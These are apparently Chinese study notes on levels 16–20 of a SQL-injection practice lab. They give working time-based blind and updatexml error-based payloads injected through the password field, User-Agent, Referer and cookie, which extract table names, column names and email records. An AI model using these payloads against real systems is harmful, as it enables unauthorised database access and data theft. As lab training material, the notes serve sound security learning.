第16关 时间盲注

随便提交几次，发现没有回显，考虑时间盲注

闭合符号

用户名随意，时间用了26s（用了or连接）

用户名正确，用了2s（用了and连接）

第17关 报错注入

从密码入手

判断闭合

在已知用户名admin下，进行注入
有回显，使用报错注入

爆表名

uname=admin&passwd=' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&submit=Submit

爆字段

uname=admin&passwd=' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&submit=Submit

uname=admin&passwd=' and updatexml(1,concat(0x7e,(select group_concat(email_id) from emails),0x7e),1)#&submit=Submit

sql注入18 user-agent注入

这题注入的前提是账户名和密码要正确

使用报错注入

两个都可以用
 ' and updatexml(1,concat(0x7e,(database()),0x7e),1),1,1)#   
 ' ,1, updatexml(1,concat(0x7e,(database()),0x7e),1),1,1)#   

注意后面两个1，将ip和uname代替了

sql注入19-referer注入
和18关相差不大，只是注入位置在referer

sql注入20 cookie注入

uname=' union select 1,2,(updatexml(1,concat(0x7e,database(),0x7e),1))# ;
或者
uname=' and updatexml(1,concat(0x7e,database(),0x7e),1)# ;